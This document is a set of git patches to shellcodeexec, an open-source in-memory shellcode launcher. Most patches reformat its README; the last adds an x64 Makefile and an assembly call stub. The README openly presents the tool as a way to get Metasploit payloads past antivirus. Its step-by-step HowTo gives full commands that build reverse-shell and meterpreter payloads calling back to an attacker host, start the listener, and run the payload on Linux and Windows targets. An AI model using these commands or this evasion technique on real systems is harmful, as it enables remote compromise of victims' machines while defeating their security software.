From 6798ad80fcabeec0dd034af5b7149d0dd7307bd8 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Wed, 27 Jun 2012 01:12:31 +0200 Subject: [PATCH 1/6] Update master --- README | 120 ++++++++++++--------------------------------------------- 1 file changed, 24 insertions(+), 96 deletions(-) diff --git a/README b/README index 85620c3..69b1554 100755 --- a/README +++ b/README @@ -1,127 +1,55 @@ -= Short description = +# Short description shellcodeexec is a small script to execute in memory a sequence of opcodes. +## Background -= Background = +Most of the shellcode launchers out there, including proof of concepts part of many "security" books, detail how to allocate a memory page as readable/writable/executable on POSIX systems, copy over your shellcode and execute it. This works just fine. However, it is limited to POSIX, does not necessarily consider 64-bit architecture and Windows systems. -Most of the shellcode launchers out there, including proof of concepts -part of many "security" books, detail how to allocate a memory page as -readable/writable/executable on POSIX systems, copy over your shellcode -and execute it. This works just fine. However, it is limited to POSIX, -does not necessarily consider 64-bit architecture and Windows systems. +## Description +This script and the relevant project files (Makefile and Visual Studio files) allow you to compile the tool once then run your shellcode across different architectures and operating systems. -= Description = - -This script and the relevant project files (Makefile and Visual Studio -files) allow you to compile the tool once then run your shellcode across -different architectures and operating systems. - -Moreover, it solves a common real world issue: the target system's anti -virus software blocking a Metasploit-generated payload stager (either EXE -of ELF). Take for instance the following command line: +Moreover, it solves a common real world issue: the target system's anti virus software blocking a Metasploit-generated payload stager (either EXE of ELF). Take for instance the following command line: $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe -This generates a Metasploit payload stager, payload.exe, that as soon as -it lands on the AV-protected target system is recognized as malicious and -potentially blocked (depending on the on-access scan settings) by many -anti virus products. At the time of writing this text, 21 out 41 anti -viruses detect it as malicious - http://goo.gl/HTw7o. By encoding it -multiple times with msfencode, less AV softwares detect it, still a lot. +This generates a Metasploit payload stager, payload.exe, that as soon as it lands on the AV-protected target system is recognized as malicious and potentially blocked (depending on the on-access scan settings) by many anti virus products. At the time of writing this text, 21 out 41 anti viruses detect it as malicious - http://goo.gl/HTw7o. By encoding it multiple times with msfencode, less AV softwares detect it, still a lot. -I have been surfing the Net and found some interesting tutorials and -guides about packing, compressing, obfuscating and applying IDA-foo to -portable executables et similar in order to narrow down the number of AV -products that can detect it as a malicious file. This is all interesting, -but does not stop few hard-to-die anti viruses to detect your backdoor. +I have been surfing the Net and found some interesting tutorials and guides about packing, compressing, obfuscating and applying IDA-foo to portable executables et similar in order to narrow down the number of AV products that can detect it as a malicious file. This is all interesting, but does not stop few hard-to-die anti viruses to detect your backdoor. -So the question is, how cool would it be to have a final solution to avoid -all this hassle? This is exactly where this tool comes into play! +So the question is, how cool would it be to have a final solution to avoid all this hassle? This is exactly where this tool comes into play! - -= Features = +## Features shellcodeexec: * Can be compiled and works on POSIX (Linux/Unices) and Windows systems. - * Can be compiled and works on 32-bit and 64-bit architectures. - * As far as I know, no AV detect it as malicious. +* Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx - Readable Writable and eXecutable. +* It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode. +* Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours. -* Works in DEP/NX-enabled environments: it allocates the memory page where - it stores the shellcode as +rwx - Readable Writable and eXecutable. - -* It supports alphanumeric encoded payloads: you can pipe your binary-encoded - shellcode (generated for instance with Metasploit's msfpayload) to - Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the - BufferRegister variable to EAX registry where the address in memory of - the shellcode will be stored, to avoid get_pc() binary stub to be - prepended to the shellcode. - -* Spawns a new thread where the shellcode is executed in a structure - exception handler (SEH) so that if you wrap shellcodeexec into your own - executable, it avoids the whole process to crash in case of unexpected - behaviours. - - -= HowTo = - -1. Generate a Metasploit shellcode and encode it with the alphanumeric - encoder. For example for a Linux target: +## HowTo +1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Linux target: $ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX - - Or for a Windows target: - +Or for a Windows target: $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX - - -2. Execute the Metasploit multi/handler listener on your machine. For - example for a Linux target: - +2. Execute the Metasploit multi/handler listener on your machine. For example for a Linux target: $ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E - - Or for a Windows target: - +Or for a Windows target: $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E - - -3. Execute the alphanumeric-encoded shellcode with this tool. For example - on the Linux target: - +3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Linux target: $ ./shellcodeexec - - Or, on the Windows target: - +Or, on the Windows target: C:\WINDOWS\Temp>shellcodeexec.exe +## License -= License = - -This source code is free software; you can redistribute it and/or -modify it under the terms of the GNU Lesser General Public -License as published by the Free Software Foundation; either -version 2.1 of the License, or (at your option) any later version. - -This library is distributed in the hope that it will be useful, -but WITHOUT ANY WARRANTY; without even the implied warranty of -MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -Lesser General Public License for more details. - -You should have received a copy of the GNU Lesser General Public -License along with this library; if not, write to the Free Software -Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - - -= Author = - -Bernardo Damele A. G. - - -= Homepage = +This source code is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. -https://github.com/inquisb/shellcodeexec +This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. +You should have received a copy of the GNU Lesser General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA \ No newline at end of file From 6edfa350eaad57d2e65eaf53695fb0b898bffd03 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Wed, 27 Jun 2012 00:16:27 +0100 Subject: [PATCH 2/6] Renamed README file --- README => README.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename README => README.md (100%) diff --git a/README b/README.md similarity index 100% rename from README rename to README.md From d3f3a3f5f489c642f9cc292f63e4c8bc1ebc40c9 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Wed, 27 Jun 2012 00:17:34 +0100 Subject: [PATCH 3/6] minor adjustments to README --- README.md | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 69b1554..2b6cc7f 100755 --- a/README.md +++ b/README.md @@ -34,11 +34,16 @@ shellcodeexec: ## HowTo 1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Linux target: - $ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX + $ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX + Or for a Windows target: $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX + 2. Execute the Metasploit multi/handler listener on your machine. For example for a Linux target: - $ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E +``` +$ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E +``` + Or for a Windows target: $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E 3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Linux target: @@ -52,4 +57,4 @@ This source code is free software; you can redistribute it and/or modify it unde This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. -You should have received a copy of the GNU Lesser General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA \ No newline at end of file +You should have received a copy of the GNU Lesser General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA From be434944ba8b31dc1a7bc567cf713ca730272970 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Wed, 27 Jun 2012 00:19:09 +0100 Subject: [PATCH 4/6] minor adjustments to README --- README.md | 23 +++++++++++++++-------- 1 file changed, 15 insertions(+), 8 deletions(-) diff --git a/README.md b/README.md index 2b6cc7f..bd6c7a6 100755 --- a/README.md +++ b/README.md @@ -34,22 +34,29 @@ shellcodeexec: ## HowTo 1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Linux target: - $ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX - +``` +$ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX +``` Or for a Windows target: - $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX - +``` +$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX +``` 2. Execute the Metasploit multi/handler listener on your machine. For example for a Linux target: ``` $ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E ``` - Or for a Windows target: - $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E +``` +$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E +``` 3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Linux target: - $ ./shellcodeexec +``` +$ ./shellcodeexec +``` Or, on the Windows target: - C:\WINDOWS\Temp>shellcodeexec.exe +``` +C:\WINDOWS\Temp>shellcodeexec.exe +``` ## License From cb54310537547e3a0df3565594258044dbe23586 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Wed, 27 Jun 2012 00:23:14 +0100 Subject: [PATCH 5/6] minor adjustments to README --- README.md | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index bd6c7a6..bc77787 100755 --- a/README.md +++ b/README.md @@ -1,13 +1,11 @@ -# Short description - -shellcodeexec is a small script to execute in memory a sequence of opcodes. - ## Background Most of the shellcode launchers out there, including proof of concepts part of many "security" books, detail how to allocate a memory page as readable/writable/executable on POSIX systems, copy over your shellcode and execute it. This works just fine. However, it is limited to POSIX, does not necessarily consider 64-bit architecture and Windows systems. ## Description +shellcodeexec is an open source script to execute in memory a sequence of opcodes. + This script and the relevant project files (Makefile and Visual Studio files) allow you to compile the tool once then run your shellcode across different architectures and operating systems. Moreover, it solves a common real world issue: the target system's anti virus software blocking a Metasploit-generated payload stager (either EXE of ELF). Take for instance the following command line: From b61598d7f2b74547558998fd4c4f7011d63f0808 Mon Sep 17 00:00:00 2001 From: Vlatko Kosturjak Date: Sun, 22 Jun 2014 20:36:54 +0200 Subject: [PATCH 6/6] Fix for x64 build --- windows/shellcodeexec/Makefile.v64 | 8 ++++++++ windows/shellcodeexec/__exec_payload.asm | 7 +++++++ 2 files changed, 15 insertions(+) create mode 100644 windows/shellcodeexec/Makefile.v64 create mode 100644 windows/shellcodeexec/__exec_payload.asm diff --git a/windows/shellcodeexec/Makefile.v64 b/windows/shellcodeexec/Makefile.v64 new file mode 100644 index 0000000..50edd90 --- /dev/null +++ b/windows/shellcodeexec/Makefile.v64 @@ -0,0 +1,8 @@ +shellcodeexecvc64.exe: shellcodeexec.obj __exec_payload.obj + link shellcodeexec.obj __exec_payload.obj + +shellcodeexec.obj: shellcodeexec.c + cl shellcodeexec.c /Os /TC /c + +__exec_payload.obj: __exec_payload.asm + ml64 __exec_payload.asm /c diff --git a/windows/shellcodeexec/__exec_payload.asm b/windows/shellcodeexec/__exec_payload.asm new file mode 100644 index 0000000..167e0ad --- /dev/null +++ b/windows/shellcodeexec/__exec_payload.asm @@ -0,0 +1,7 @@ +.CODE +__exec_payload PROC x:QWORD + mov rax, x + call QWORD PTR[rax] + ret +__exec_payload ENDP +END